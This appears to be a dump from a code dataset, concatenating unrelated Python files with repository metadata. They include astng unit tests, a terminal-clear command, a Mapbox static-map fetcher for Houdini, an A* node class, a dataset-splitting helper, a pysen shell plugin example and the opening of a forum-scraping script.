        # Functions expose synthetic __name__/__doc__ Const nodes.
        func = MODULE2['make_class']
        self.assertEquals(len(func.getattr('__name__')), 1)
        self.assertIsInstance(func.getattr('__name__')[0], nodes.Const)
        self.assertEquals(func.getattr('__name__')[0].value, 'make_class')
        self.assertEquals(len(func.getattr('__doc__')), 1)
        self.assertIsInstance(func.getattr('__doc__')[0], nodes.Const)
        self.assertEquals(func.getattr('__doc__')[0].value, 'check base is correctly resolved to Concrete0')
        self.assertEquals(len(MODULE.getattr('__dict__')), 1)
        self.assertIsInstance(MODULE.getattr('__dict__')[0], nodes.Dict)
    def test_dict_interface(self):
        _test_dict_interface(self, MODULE['global_access'], 'local')
    def test_default_value(self):
        # Only 'base' has a default; the others raise NoDefault.
        func = MODULE2['make_class']
        self.assertIsInstance(func.args.default_value('base'), nodes.Getattr)
        self.assertRaises(scoped_nodes.NoDefault, func.args.default_value, 'args')
        self.assertRaises(scoped_nodes.NoDefault, func.args.default_value, 'kwargs')
        self.assertRaises(scoped_nodes.NoDefault, func.args.default_value, 'any')
        #self.assertIsInstance(func.mularg_class('args'), nodes.Tuple)
        #self.assertIsInstance(func.mularg_class('kwargs'), nodes.Dict)
        #self.assertEquals(func.mularg_class('base'), None)
    def test_navigation(self):
        function = MODULE['global_access']
        self.assertEquals(function.statement(), function)
        l_sibling = function.previous_sibling()
        # check taking parent if child is not a stmt
        self.assertIsInstance(l_sibling, nodes.Assign)
        child = function.args.args[0]
        self.assert_(l_sibling is child.previous_sibling())
        r_sibling = function.next_sibling()
        self.assertIsInstance(r_sibling, nodes.Class)
        self.assertEquals(r_sibling.name, 'YO')
        self.assert_(r_sibling is child.next_sibling())
        # walking forward off the end / backward off the start yields None
        last = r_sibling.next_sibling().next_sibling().next_sibling()
        self.assertIsInstance(last, nodes.Assign)
        self.assertEquals(last.next_sibling(), None)
        first = l_sibling.previous_sibling().previous_sibling().previous_sibling().previous_sibling().previous_sibling()
        self.assertEquals(first.previous_sibling(), None)
    def test_nested_args(self):
        # py2 tuple-unpacking parameters: def nested_args(a, (b, c, d))
        func = MODULE['nested_args']
        #self.assertEquals(func.args.args, ['a', ('b', 'c', 'd')])
        local = func.keys()
        local.sort()
        self.assertEquals(local, ['a', 'b', 'c', 'd'])
        self.assertEquals(func.type, 'function')
    def test_format_args(self):
        func = MODULE2['make_class']
        self.assertEquals(func.args.format_args(), 'any, base=data.module.YO, *args, **kwargs')
        func = MODULE['nested_args']
        self.assertEquals(func.args.format_args(), 'a, (b, c, d)')
    def test_is_abstract(self):
        method = MODULE2['AbstractClass']['to_override']
        self.assert_(method.is_abstract(pass_is_abstract=False))
        self.failUnlessEqual(method.qname(), 'data.module2.AbstractClass.to_override')
        self.failUnlessEqual(method.pytype(), '__builtin__.instancemethod')
        method = MODULE2['AbstractClass']['return_something']
        self.assert_(not method.is_abstract(pass_is_abstract=False))
        # non regression : test raise "string" doesn't cause an exception in is_abstract
        func = MODULE2['raise_string']
        self.assert_(not func.is_abstract(pass_is_abstract=False))
##     def test_raises(self):
##         method = MODULE2['AbstractClass']['to_override']
##         self.assertEquals([str(term) for term in method.raises()],
##                           ["CallFunc(Name('NotImplementedError'), [], None, None)"] )
##     def test_returns(self):
##         method = MODULE2['AbstractClass']['return_something']
##         # use string comp since Node doesn't handle __cmp__
##         self.assertEquals([str(term) for term in method.returns()],
##                           ["Const('toto')", "Const(None)"])
    def test_lambda_pytype(self):
        # a lambda bound to a name is still a plain function at the type level
        data = '''
def f():
    g = lambda: None
        '''
        astng = abuilder.string_build(data, __name__, __file__)
        g = list(astng['f'].ilookup('g'))[0]
        self.failUnlessEqual(g.pytype(), '__builtin__.function')
    def test_is_method(self):
        # decorated functions inside a class body count as methods,
        # decorated module-level functions do not
        if sys.version_info < (2, 4):
            self.skip('this test require python >= 2.4')
        data = '''
class A:
    def meth1(self):
        return 1
    @classmethod
    def meth2(cls):
        return 2
    @staticmethod
    def meth3():
        return 3
def function():
    return 0
@staticmethod
def sfunction():
    return -1
        '''
        astng = abuilder.string_build(data, __name__, __file__)
        self.failUnless(astng['A']['meth1'].is_method())
        self.failUnless(astng['A']['meth2'].is_method())
        self.failUnless(astng['A']['meth3'].is_method())
        self.failIf(astng['function'].is_method())
        self.failIf(astng['sfunction'].is_method())
    def test_argnames(self):
        # tuple parameters are flattened into the argument name list
        code = 'def f(a, (b, c), *args, **kwargs): pass'
        astng = abuilder.string_build(code, __name__, __file__)
        self.assertEquals(astng['f'].argnames(), ['a', 'b', 'c', 'args', 'kwargs'])
class ClassNodeTC(TestCase):
    """Tests for astng Class nodes: special attributes, ancestors,
    method/attribute lookup, interfaces and getattr/igetattr semantics.

    Relies on the module-level fixtures MODULE / MODULE2 / NONREGR
    (prebuilt astng trees for the data/ test modules).
    """
    def test_dict_interface(self):
        _test_dict_interface(self, MODULE['YOUPI'], 'method')
    def test_cls_special_attributes_1(self):
        # a source-defined class exposes synthetic __bases__/__name__/... nodes
        cls = MODULE['YO']
        self.assertEquals(len(cls.getattr('__bases__')), 1)
        self.assertEquals(len(cls.getattr('__name__')), 1)
        self.assertIsInstance(cls.getattr('__name__')[0], nodes.Const)
        self.assertEquals(cls.getattr('__name__')[0].value, 'YO')
        self.assertEquals(len(cls.getattr('__doc__')), 1)
        self.assertIsInstance(cls.getattr('__doc__')[0], nodes.Const)
        self.assertEquals(cls.getattr('__doc__')[0].value, 'hehe')
        self.assertEquals(len(cls.getattr('__module__')), 1)
        self.assertIsInstance(cls.getattr('__module__')[0], nodes.Const)
        self.assertEquals(cls.getattr('__module__')[0].value, 'data.module')
        self.assertEquals(len(cls.getattr('__dict__')), 1)
        self.assertRaises(NotFoundError, cls.getattr, '__mro__')
        # builtin proxy classes additionally expose __mro__
        for cls in (nodes.List._proxied, nodes.Const(1)._proxied):
            self.assertEquals(len(cls.getattr('__bases__')), 1)
            self.assertEquals(len(cls.getattr('__name__')), 1)
            self.assertEquals(len(cls.getattr('__doc__')), 1, (cls, cls.getattr('__doc__')))
            self.assertEquals(cls.getattr('__doc__')[0].value, cls.doc)
            self.assertEquals(len(cls.getattr('__module__')), 1)
            self.assertEquals(len(cls.getattr('__dict__')), 1)
            self.assertEquals(len(cls.getattr('__mro__')), 1)
    def test_cls_special_attributes_2(self):
        # augmented assignment to __bases__ adds a second getattr result
        astng = abuilder.string_build('''
class A: pass
class B: pass
A.__bases__ += (B,)
        ''', __name__, __file__)
        self.assertEquals(len(astng['A'].getattr('__bases__')), 2)
        self.assertIsInstance(astng['A'].getattr('__bases__')[0], nodes.Tuple)
        self.assertIsInstance(astng['A'].getattr('__bases__')[1], nodes.AssAttr)
    def test_instance_special_attributes(self):
        # instances see __dict__/__doc__ but not the class-only attributes
        for inst in (Instance(MODULE['YO']), nodes.List(), nodes.Const(1)):
            self.assertRaises(NotFoundError, inst.getattr, '__mro__')
            self.assertRaises(NotFoundError, inst.getattr, '__bases__')
            self.assertRaises(NotFoundError, inst.getattr, '__name__')
            self.assertEquals(len(inst.getattr('__dict__')), 1)
            self.assertEquals(len(inst.getattr('__doc__')), 1)
    def test_navigation(self):
        klass = MODULE['YO']
        self.assertEquals(klass.statement(), klass)
        l_sibling = klass.previous_sibling()
        self.assert_(isinstance(l_sibling, nodes.Function), l_sibling)
        self.assertEquals(l_sibling.name, 'global_access')
        r_sibling = klass.next_sibling()
        self.assertIsInstance(r_sibling, nodes.Class)
        self.assertEquals(r_sibling.name, 'YOUPI')
    def test_local_attr_ancestors(self):
        # __init__ is only defined locally on YO among YOUPI's ancestors
        klass2 = MODULE['YOUPI']
        it = klass2.local_attr_ancestors('__init__')
        anc_klass = it.next()
        self.assertIsInstance(anc_klass, nodes.Class)
        self.assertEquals(anc_klass.name, 'YO')
        self.assertRaises(StopIteration, it.next)
        it = klass2.local_attr_ancestors('method')
        self.assertRaises(StopIteration, it.next)
    def test_instance_attr_ancestors(self):
        klass2 = MODULE['YOUPI']
        it = klass2.instance_attr_ancestors('yo')
        anc_klass = it.next()
        self.assertIsInstance(anc_klass, nodes.Class)
        self.assertEquals(anc_klass.name, 'YO')
        self.assertRaises(StopIteration, it.next)
        klass2 = MODULE['YOUPI']
        it = klass2.instance_attr_ancestors('member')
        self.assertRaises(StopIteration, it.next)
    def test_methods(self):
        # methods() walks ancestors too; mymethods() is local-only
        klass2 = MODULE['YOUPI']
        methods = [m.name for m in klass2.methods()]
        methods.sort()
        self.assertEquals(methods, ['__init__', 'class_method',
                                    'method', 'static_method'])
        methods = [m.name for m in klass2.mymethods()]
        methods.sort()
        self.assertEquals(methods, ['__init__', 'class_method',
                                    'method', 'static_method'])
        klass2 = MODULE2['Specialization']
        methods = [m.name for m in klass2.mymethods()]
        methods.sort()
        self.assertEquals(methods, [])
        method_locals = klass2.local_attr('method')
        self.assertEquals(len(method_locals), 1)
        self.assertEquals(method_locals[0].name, 'method')
        self.assertRaises(NotFoundError, klass2.local_attr, 'nonexistant')
        methods = [m.name for m in klass2.methods()]
        methods.sort()
        self.assertEquals(methods, ['__init__', 'class_method',
                                    'method', 'static_method'])
    #def test_rhs(self):
    #    my_dict = MODULE['MY_DICT']
    #    self.assertIsInstance(my_dict.rhs(), nodes.Dict)
    #    a = MODULE['YO']['a']
    #    value = a.rhs()
    #    self.assertIsInstance(value, nodes.Const)
    #    self.assertEquals(value.value, 1)
    def test_ancestors(self):
        klass = MODULE['YOUPI']
        ancs = [a.name for a in klass.ancestors()]
        self.assertEquals(ancs, ['YO'])
        klass = MODULE2['Specialization']
        ancs = [a.name for a in klass.ancestors()]
        self.assertEquals(ancs, ['YOUPI', 'YO', 'YO'])
    def test_type(self):
        # class "type" classification: class / metaclass / exception / interface
        klass = MODULE['YOUPI']
        self.assertEquals(klass.type, 'class')
        klass = MODULE2['Metaclass']
        self.assertEquals(klass.type, 'metaclass')
        klass = MODULE2['MyException']
        self.assertEquals(klass.type, 'exception')
        klass = MODULE2['MyIFace']
        self.assertEquals(klass.type, 'interface')
        klass = MODULE2['MyError']
        self.assertEquals(klass.type, 'exception')
    def test_interfaces(self):
        for klass, interfaces in (('Concrete0', ['MyIFace']),
                                  ('Concrete1', ['MyIFace', 'AnotherIFace']),
                                  ('Concrete2', ['MyIFace', 'AnotherIFace']),
                                  ('Concrete23', ['MyIFace', 'AnotherIFace'])):
            klass = MODULE2[klass]
            self.assertEquals([i.name for i in klass.interfaces()],
                              interfaces)
    def test_concat_interfaces(self):
        # __implements__ built by concatenating other classes' __implements__
        astng = abuilder.string_build('''
class IMachin: pass
class Correct2:
    """docstring"""
    __implements__ = (IMachin,)
class BadArgument:
    """docstring"""
    __implements__ = (IMachin,)
class InterfaceCanNowBeFound:
    """docstring"""
    __implements__ = BadArgument.__implements__ + Correct2.__implements__
        ''')
        self.assertEquals([i.name for i in astng['InterfaceCanNowBeFound'].interfaces()],
                          ['IMachin'])
    def test_inner_classes(self):
        eee = NONREGR['Ccc']['Eee']
        self.assertEquals([n.name for n in eee.ancestors()], ['Ddd', 'Aaa', 'object'])
    def test_classmethod_attributes(self):
        # attributes assigned on `cls` inside a classmethod become class locals
        data = '''
class WebAppObject(object):
    def registered(cls, application):
        cls.appli = application
        cls.schema = application.schema
        cls.config = application.config
        return cls
    registered = classmethod(registered)
        '''
        astng = abuilder.string_build(data, __name__, __file__)
        cls = astng['WebAppObject']
        self.assertEquals(sorted(cls.locals.keys()),
                          ['appli', 'config', 'registered', 'schema'])
    def test_class_getattr(self):
        data = '''
class WebAppObject(object):
    appli = application
    appli += 2
    del self.appli
        '''
        astng = abuilder.string_build(data, __name__, __file__)
        cls = astng['WebAppObject']
        # test del statement not returned by getattr
        self.assertEquals(len(cls.getattr('appli')), 2)
    def test_instance_getattr(self):
        data = '''
class WebAppObject(object):
    def __init__(self, application):
        self.appli = application
        self.appli += 2
        del self.appli
        '''
        astng = abuilder.string_build(data, __name__, __file__)
        inst = Instance(astng['WebAppObject'])
        # test del statement not returned by getattr
        self.assertEquals(len(inst.getattr('appli')), 2)
    def test_instance_getattr_with_class_attr(self):
        # instance lookup merges instance-level and class-level assignments
        data = '''
class Parent:
    aa = 1
    cc = 1
class Klass(Parent):
    aa = 0
    bb = 0
    def incr(self, val):
        self.cc = self.aa
        if val > self.aa:
            val = self.aa
        if val < self.bb:
            val = self.bb
        self.aa += val
        '''
        astng = abuilder.string_build(data, __name__, __file__)
        inst = Instance(astng['Klass'])
        self.assertEquals(len(inst.getattr('aa')), 3, inst.getattr('aa'))
        self.assertEquals(len(inst.getattr('bb')), 1, inst.getattr('bb'))
        self.assertEquals(len(inst.getattr('cc')), 2, inst.getattr('cc'))
    def test_getattr_method_transform(self):
        # functions attached to a class after definition still infer as methods
        data = '''
class Clazz(object):
    def m1(self, value):
        self.value = value
    m2 = m1
def func(arg1, arg2):
    "function that will be used as a method"
    return arg1.value + arg2
Clazz.m3 = func
inst = Clazz()
inst.m4 = func
        '''
        astng = abuilder.string_build(data, __name__, __file__)
        cls = astng['Clazz']
        # test del statement not returned by getattr
        for method in ('m1', 'm2', 'm3'):
            inferred = list(cls.igetattr(method))
            self.assertEquals(len(inferred), 1)
            self.assertIsInstance(inferred[0], UnboundMethod)
            inferred = list(Instance(cls).igetattr(method))
            self.assertEquals(len(inferred), 1)
            self.assertIsInstance(inferred[0], BoundMethod)
        inferred = list(Instance(cls).igetattr('m4'))
        self.assertEquals(len(inferred), 1)
        self.assertIsInstance(inferred[0], nodes.Function)
# Restrict `from <module> import *` to the test case classes defined above.
__all__ = ('ModuleNodeTC', 'ImportNodeTC', 'FunctionNodeTC', 'ClassNodeTC')
if __name__ == '__main__':
    unittest_main()
| 1.664063 | 2 |
sprint/commands/clear.py | ii-Python/Sprint | 0 | 12766812 | # Modules
import subprocess
from os import name
from ..utils.bases import BaseCommand
# Command class
class Clear(BaseCommand):
    """Clears the terminal screen.

    Uses ``cls`` on Windows (``os.name == "nt"``) and ``clear`` everywhere
    else.
    """

    def __init__(self, core):
        self.core = core

    def clear(self, arguments):
        """Run the platform-appropriate clear command.

        :param arguments: command-line arguments (unused; kept to match the
            common command interface)
        """
        # os.name == "nt" identifies Windows, whose shell builtin is `cls`.
        command = "cls" if name == "nt" else "clear"
        # With shell=True the command must be a single string: a list would
        # only forward its first element to the shell on POSIX systems.
        subprocess.run(command, shell = True)
| 2.625 | 3 |
tests/spring_cloud/ribbon/spring_client_factory_test.py | haribo0915/Spring-Cloud-in-Python | 5 | 12766813 | # -*- coding: utf-8 -*-
# standard library
from unittest.mock import Mock
__author__ = "Ssu-Tsen"
__license__ = "Apache 2.0"
# standard library
# scip plugin
from ribbon.client.config.client_config import ClientConfig
from spring_cloud.ribbon.spring_client_factory import DynamicServerListLoadBalancer, SpringClientFactory
class TestSpringClientFactory:
    """Checks that SpringClientFactory builds and caches per-service objects."""

    # Stubbed eureka client that always reports an empty instance list.
    eureka_client = Mock()
    eureka_client.get_instances_by_virtual_host_name = Mock(return_value=[])
    spring_client_factory = SpringClientFactory(eureka_client)

    def test_get_client_config(self):
        factory = self.spring_client_factory
        # A fresh service id yields a ClientConfig ...
        assert isinstance(factory.get_client_config("1"), ClientConfig)
        # ... and repeated lookups for the same id return the cached object.
        assert factory.get_client_config("2") == factory.get_client_config("2")

    def test_get_load_balancer(self):
        factory = self.spring_client_factory
        # A fresh service id yields a DynamicServerListLoadBalancer ...
        assert isinstance(factory.get_load_balancer("1"), DynamicServerListLoadBalancer)
        # ... and repeated lookups for the same id return the cached object.
        assert factory.get_load_balancer("2") == factory.get_load_balancer("2")
| 2.171875 | 2 |
eqDataVisLib/mapGen.py | coolgauss/usgsEarthquakeDataVis | 0 | 12766814 | import hou
class MapBoxHandler(object):
    """Fetches a static map image from the Mapbox Static Images API using
    the current node's parameters, and can aim the viewport at the node's
    embedded map camera.

    NOTE: this is Python 2 code (print statements, cPickle).
    """
    # Name of the camera node embedded under the current node.
    CAM_NAME = 'map_cam'
    # Parameter names read off the current Houdini node.
    MAPBOX_TOKEN_FILE_PARMNAME = 'mapbox_token_file'
    USE_PICKLED_TOKEN_PARMNAME = 'use_pickled_token'
    MAPBOX_TOKEN_STR_PARMNAME = 'mapbox_token_string'
    LAT_CENTER_PARMNAME = 'lat_center'
    LON_CENTER_PARMNAME = 'lon_center'
    ZOOM_PARMNAME = 'zoom'
    RESOLUTION_PARMNAME = 'resolution'
    MAPPATH_PARMNAME = 'mappath'
    def __init__(self):
        pass
    @property
    def node(self):
        # The handler always operates on the node currently being cooked.
        return hou.pwd()
    def _getPickledMapboxToken(self):
        # Load a Mapbox access token previously pickled to disk; the file
        # path comes from the node's token-file parameter.
        import cPickle as pickle
        pickledTokenPath = hou.evalParm(self.MAPBOX_TOKEN_FILE_PARMNAME)
        #import os
        #pickledTokenPath = os.path.join(hou.getenv('HIP'), 'pickledToken.tok')
        with open(pickledTokenPath, 'r') as f:
            token = pickle.load(f)
        return token
    def _getMapboxToken(self):
        # Prefer the pickled token file when the toggle is enabled, else read
        # the token straight from the string parameter.
        if hou.evalParm(self.USE_PICKLED_TOKEN_PARMNAME):
            return self._getPickledMapboxToken()
        return hou.evalParm(self.MAPBOX_TOKEN_STR_PARMNAME)
    def _getLatCenter(self):
        return hou.evalParm(self.LAT_CENTER_PARMNAME)
    def _getLonCenter(self):
        return hou.evalParm(self.LON_CENTER_PARMNAME)
    def _getZoom(self):
        return hou.evalParm(self.ZOOM_PARMNAME)
    def _getResolution(self):
        # Resolution is a 2-tuple parameter (width, height).
        return hou.evalParmTuple(self.RESOLUTION_PARMNAME)
    def generateMap(self):
        # Request a static map centred on (lat, lon) at the configured zoom
        # and resolution, then write the image to the `mappath` parameter.
        token = self._getMapboxToken()
        lat = self._getLatCenter()
        lon = self._getLonCenter()
        zoom = self._getZoom()
        res = self._getResolution()
        # XXX: Currently, we only consider the simple style map
        urlPrefix = 'https://api.mapbox.com/styles/v1/mapbox/streets-v8/static'
        #urlPrefix = 'https://api.mapbox.com/styles/v1/mapbox/satellite-streets-v10/static
        url = '{}/{},{},{},0/{}x{}?access_token={}'.format(urlPrefix, lon, \
            lat, zoom, res[0], res[1], token)
        import requests
        # get a world map
        print 'requesting url - {}'.format(url)
        # NOTE: `res` is rebound here from the resolution tuple to the HTTP
        # response object.
        res = requests.get(url, stream=True)
        outmap = hou.evalParm(self.MAPPATH_PARMNAME)
        with open(outmap, 'wb') as f:
            f.write(res.content)
        print 'wrote an image - {}'.format(outmap)
    def setCurrentViewportCam(self):
        # Point the active scene viewport at this node's embedded camera.
        import toolutils
        cam = hou.node('{}/{}'.format(self.node.path(), self.CAM_NAME))
        sceneViewer = toolutils.sceneViewer()
        viewport = sceneViewer.curViewport()
        viewport.setCamera(cam)
def refreshGlCache():
    """Flush Houdini's OpenGL cache so regenerated map textures reload."""
    clear_cache_cmd = 'glcache -c'
    hou.hscript(clear_cache_cmd)
| 2.515625 | 3 |
python/rich/richprogress2.py | jdurbin/sandbox | 0 | 12766815 | #!/usr/bin/env python
from rich.progress import track
from rich import print
from rich.progress import Progress
from rich.table import Column
from rich.progress import Progress, BarColumn, TextColumn,TimeRemainingColumn,SpinnerColumn,TimeElapsedColumn
from rich.console import Console
# Input FASTA file and running count of sequence headers seen so far.
filename = "big.fa"
seqCount = 0

# Count lines up front so the progress bar has a known total.
# Use a context manager so the file handle is closed deterministically
# (the original `open()` inside sum() leaked the handle).
with open(filename, 'r') as f:
    num_lines = sum(1 for line in f)
print("num_lines:", num_lines)

console = Console(record=True)
with Progress(
    SpinnerColumn(),
    TextColumn("[progress.description]{task.description}"),
    BarColumn(),
    TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
    TimeRemainingColumn(),
    TimeElapsedColumn(),
    console=console,
    transient=True,
) as progress:
    task1 = progress.add_task("[green]Reading FASTA", total=num_lines)
    with open(filename) as f:
        for line in f:
            progress.update(task1, advance=1)
            # FASTA header lines contain ">": count and log each one.
            if ">" in line:
                seqCount += 1
                progress.log(line.strip(), seqCount)
| 2.59375 | 3 |
data/migrations/0115_message_pending_delivery.py | SIXMON/peps | 5 | 12766816 | <filename>data/migrations/0115_message_pending_delivery.py
# Generated by Django 3.1.1 on 2020-11-19 09:14
from django.db import migrations, models
class Migration(migrations.Migration):
    """Adds the `pending_delivery` boolean flag to the Message model."""
    # Builds on the migration that introduced Farmer.can_send_messages.
    dependencies = [
        ('data', '0114_farmer_can_send_messages'),
    ]
    operations = [
        # New boolean column; existing rows are backfilled with False.
        migrations.AddField(
            model_name='message',
            name='pending_delivery',
            field=models.BooleanField(default=False),
        ),
    ]
| 1.476563 | 1 |
find_outlier/find_the_outlier.py | yesblogger/Codewar | 0 | 12766817 | <filename>find_outlier/find_the_outlier.py
"""
created on 16/04/2017
author: <NAME>
"""
from collections import Counter as C
def find_outlier(integers):
    """Return the single integer whose parity differs from all the others.

    `integers` must hold at least three values that all share one parity,
    except for exactly one outlier.

    The original implementation round-tripped through string tags and a
    Counter; partitioning by parity directly is simpler and equivalent.
    """
    evens = [n for n in integers if n % 2 == 0]
    odds = [n for n in integers if n % 2 != 0]
    # Exactly one of the two partitions holds the lone outlier.
    return evens[0] if len(evens) == 1 else odds[0]
# print(find_outlier([2, 4, 0, 100, 4, 11, 2602, 36]))
| 3.421875 | 3 |
examples/plugin_example/plugin.py | pfnet/pysen | 423 | 12766818 | import dataclasses
import pathlib
import subprocess
from typing import DefaultDict, List, Sequence
import dacite
from pysen.command import CommandBase
from pysen.component import ComponentBase, RunOptions
from pysen.path import change_dir
from pysen.plugin import PluginBase
from pysen.pyproject_model import Config, PluginConfig
from pysen.reporter import Reporter
from pysen.runner_options import PathContext
from pysen.setting import SettingFile
class ShellCommand(CommandBase):
    """A pysen command that runs a shell command from a fixed base directory."""

    def __init__(self, name: str, base_dir: pathlib.Path, cmd: Sequence[str]) -> None:
        self._name = name
        self._base_dir = base_dir
        self._cmd = cmd

    @property
    def name(self) -> str:
        return self._name

    def __call__(self, reporter: Reporter) -> int:
        """Run the command and return its exit code (255 if it failed to run).

        The process is launched with the working directory set to
        ``base_dir`` so relative paths in the command resolve consistently.
        """
        with change_dir(self._base_dir):
            try:
                ret = subprocess.run(self._cmd)
                reporter.logger.info(f"{self._cmd} returns {ret.returncode}")
                return ret.returncode
            except BaseException as e:
                # BaseException is caught deliberately so even interrupts are
                # reported as a failed run instead of unwinding pysen.
                # (Fixed typo in the log message: "occured" -> "occurred".)
                reporter.logger.info(
                    f"an error occurred while executing: {self._cmd}\n{e}"
                )
                return 255
class ShellComponent(ComponentBase):
    """Exposes a configured shell command to pysen as a component."""
    def __init__(self, name: str, cmd: Sequence[str], targets: Sequence[str]) -> None:
        self._name = name
        self._cmd = cmd
        self._targets = targets
    @property
    def name(self) -> str:
        return self._name
    def export_settings(
        self, paths: PathContext, files: DefaultDict[str, SettingFile],
    ) -> None:
        # Shell commands have no tool configuration files to generate.
        print(f"Called export_settings at {self._name}: do nothing")
    @property
    def targets(self) -> Sequence[str]:
        return self._targets
    def create_command(
        self, target: str, paths: PathContext, options: RunOptions
    ) -> CommandBase:
        # The runner only requests targets this component declared support for.
        assert target in self._targets
        return ShellCommand(self._name, paths.base_dir, self._cmd)
@dataclasses.dataclass
class ShellPluginConfig:
    """Typed schema of this plugin's `config` table in pyproject.toml."""
    name: str  # display name for the generated component/command
    command: List[str]  # argv of the shell command to execute
    targets: List[str]  # pysen targets (e.g. "lint", "format") the command serves
class ShellPlugin(PluginBase):
    """Plugin that materialises a ShellComponent from pyproject config."""

    def load(
        self, file_path: pathlib.Path, config_data: PluginConfig, root: Config
    ) -> Sequence[ComponentBase]:
        """Parse the plugin's config table and return its shell component."""
        assert (
            config_data.config is not None
        ), f"{config_data.location}.config must be not None"
        # strict=True makes dacite reject unknown keys in the config table.
        parsed = dacite.from_dict(
            ShellPluginConfig, config_data.config, dacite.Config(strict=True)
        )
        component = ShellComponent(parsed.name, parsed.command, parsed.targets)
        return [component]
# NOTE(igarashi): This is the entry point of a plugin method
def plugin() -> PluginBase:
    """Factory called by pysen's plugin loader to obtain the plugin instance."""
    return ShellPlugin()
| 2 | 2 |
Node.py | ihartb/AStar | 0 | 12766819 | class Node:
def __init__(self, x, y):
self.g = 0
self.h = 0
self.f = 0
self.parent = None
self.cost = 1
self.x = x
self.y = y
self.left_child = None
self.right_child = None
self.top_child = None
self.down_child = None
def update_h(self, goal):
self.h = abs(self.x - goal.x) + abs(self.y - goal.y)
self.f = self.h + self.g
def update_hnew(self, goalC):
self.h = goalC - self.g
self.f = self.h + self.g
def update_g(self, new_g):
self.g = new_g
self.f = new_g + self.h
    def update_f(self, new_f):
        # Directly overwrite the combined cost estimate f (bypasses g + h).
        self.f = new_f
    def print(self):
        # Debug helper: prints the node's coordinates, e.g. "( 1 ,  2 )".
        print("(", self.x, ", ", self.y, ")")
def traverse_children(self, i):
if i == 0: return self.right_child
if i == 1: return self.left_child
if i == 2: return self.top_child
return self.down_child
| 3.765625 | 4 |
thop/utils.py | zxytim/Grid-Anchor-based-Image-Cropping-Pytorch | 0 | 12766820 | <reponame>zxytim/Grid-Anchor-based-Image-Cropping-Pytorch
def clever_format(num, format="%.2f"):
    """Format a count with a metric suffix (K/M/G/T).

    Values of at most 1e3 are formatted without a suffix. The original
    implementation fell through and returned None for them -- that bug is
    fixed by the final return.
    """
    if num > 1e12:
        return format % (num / 1e12) + "T"
    if num > 1e9:
        return format % (num / 1e9) + "G"
    if num > 1e6:
        return format % (num / 1e6) + "M"
    if num > 1e3:
        return format % (num / 1e3) + "K"
    # Small values: no scaling, no suffix (previously returned None).
    return format % num
| 2.921875 | 3 |
nightson/managers/events_user_manager.py | vswamy/nightson | 0 | 12766821 | from __future__ import absolute_import
from nightson.managers.base_entity_manager import BaseEntityManager
from tornado import gen
class EventUsersManager(BaseEntityManager):
    """Fetches the users attached to an event.

    NOTE: the original class defined a zero-argument ``__init__`` that was
    immediately shadowed by the ``__init__(self, request)`` below; that dead
    definition has been removed.
    """

    def __init__(self, request):
        super(EventUsersManager, self).__init__(request)

    @gen.coroutine
    def get_users(self):
        """Return the users joined to the event named in the request.

        Selects id, names, photo URL and the last recorded location (as
        GeoJSON) for every user linked to the event via UsersEvents.
        """
        event_id = self.get_value('event_id')
        # NOTE(review): event_id is interpolated directly into the SQL text;
        # if it can come from untrusted input this is an injection risk --
        # prefer a parameterised query.
        sql = ''' SELECT
                        Users.id,
                        Users.first_name,
                        Users.last_name,
                        Users.photo_url,
                        ST_AsGeoJson(location) AS location,
                        Users.location_recorded_at
                FROM UsersEvents INNER JOIN Users ON Users.id = UsersEvents.user_id
                WHERE event_id = {0} ; '''.format(event_id)
        result = yield self.execute_sql(sql)
        raise gen.Return(result)
| 2.265625 | 2 |
docs/tutorials/tmp.py | jbkinney/mave-nn | 3 | 12766822 | <reponame>jbkinney/mave-nn<gh_stars>1-10
## PACKAGE THIS FUNCTION INTO MAVENN
def split_dataset(data_df,
                  set_col='set',
                  train_set_name='training',
                  val_set_name='validation',
                  test_set_name='test'):
    """Split *data_df* into a training+validation frame and a test frame.

    Rows are routed by the value of ``data_df[set_col]``:

    - rows labelled ``train_set_name`` or ``val_set_name`` form
      ``trainval_df``, which gains a boolean column named ``val_set_name``
      that is True exactly for the validation rows;
    - rows labelled ``test_set_name`` form ``test_df``.

    The ``set_col`` column is dropped from both outputs and their indices
    are reset.

    Parameters
    ----------
    data_df: (pd.DataFrame)
        Dataset to split.
    set_col: (str)
        Column of data_df indicating training, validation, or test set.
    train_set_name: (str)
        Value in data_df[set_col] indicating allocation to training set.
    val_set_name: (str)
        Value in data_df[set_col] indicating allocation to validation set.
    test_set_name: (str)
        Value in data_df[set_col] indicating allocation to test set.

    Returns
    -------
    trainval_df: (pd.DataFrame)
        Training + validation dataset with a boolean ``val_set_name`` column.
    test_df: (pd.DataFrame)
        Test dataset.
    """
    labels = data_df[set_col]

    # Rows labelled as training or validation make up the trainval frame;
    # the inserted boolean column marks which of them are for validation.
    in_trainval = labels.isin([train_set_name, val_set_name])
    trainval_df = data_df.loc[in_trainval].copy().reset_index(drop=True)
    trainval_df.insert(loc=0,
                       column=val_set_name,
                       value=trainval_df[set_col].eq(val_set_name))
    trainval_df.drop(columns=set_col, inplace=True)

    # Rows labelled as test make up the test frame.
    in_test = labels.eq(test_set_name)
    test_df = data_df.loc[in_test].copy().reset_index(drop=True)
    test_df.drop(columns=set_col, inplace=True)

    return trainval_df, test_df
| 2.9375 | 3 |
python/dataset/forumposts.py | anysql/sling | 0 | 12766823 | <filename>python/dataset/forumposts.py
# Copyright 2021 Ringgaard Research ApS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Extract posting threads from vBulletin-based fora."""
import re
import requests
import html
import urllib.parse
import sling
import sling.flags as flags
# Flags.
# Command-line flags: forum URL, page range, output database and options.
flags.define("--url")
flags.define("--first", type=int, default=1)
flags.define("--last", type=int, default=1)
flags.define("--db", default="vault/forum")
flags.define("--forum", default="vef")
flags.define("--images", default=False, action="store_true")
flags.define("--debug", default=False, action="store_true")
flags.parse()
# Frame store.
# Symbols used when building SLING frames; the Pxx/Qxx ids follow the
# Wikidata-style property/item naming used elsewhere in SLING.
store = sling.Store()
n_id = store["id"]
n_name = store["name"]
n_alias = store["alias"]
n_description = store["description"]
n_media = store["media"]
n_other_name = store["P2561"]
n_described_at_url = store["P973"]
n_instance_of = store["P31"]
n_forum_post = store["Q57988118"]
n_imdb = store["P345"]
